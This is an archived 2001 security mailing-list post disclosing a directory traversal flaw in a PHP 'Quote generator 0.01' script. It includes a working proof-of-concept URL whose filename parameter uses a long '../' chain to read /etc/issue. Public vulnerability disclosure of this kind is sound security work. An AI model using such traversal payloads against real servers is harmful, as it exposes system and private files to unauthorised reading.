Quote generator 0.01 by Eric Persson

From: Cabezon Aurélien - LEXSI (aczat_private)
Date: Thu Apr 26 2001 - 06:56:59 PDT

Next message: Tim Yardley: "Re: Hijack IP Address using cable modem (fwd)"

Previous message: Cabezon Aurélien - LEXSI: "iScouter PHP Web Portal System, MySQL Password in clear text"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Hi all,

Quote generator 0.01 (php script) by eric personn is vulnerable to the ../..
bug
try this :
www.yourhost.com/quote.html?filename=../../../../../../../../../../../../../
../../../etc/issue&path_to_font_file=ariali.ttf

It gives you the content of /etc/issue file

regards,

---
Cabezon Aurélien
iSecureLabs team
http://www.iSecureLabs.com
French Staff

Next message: Tim Yardley: "Re: Hijack IP Address using cable modem (fwd)"
Previous message: Cabezon Aurélien - LEXSI: "iScouter PHP Web Portal System, MySQL Password in clear text"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Thu Apr 26 2001 - 21:33:25 PDT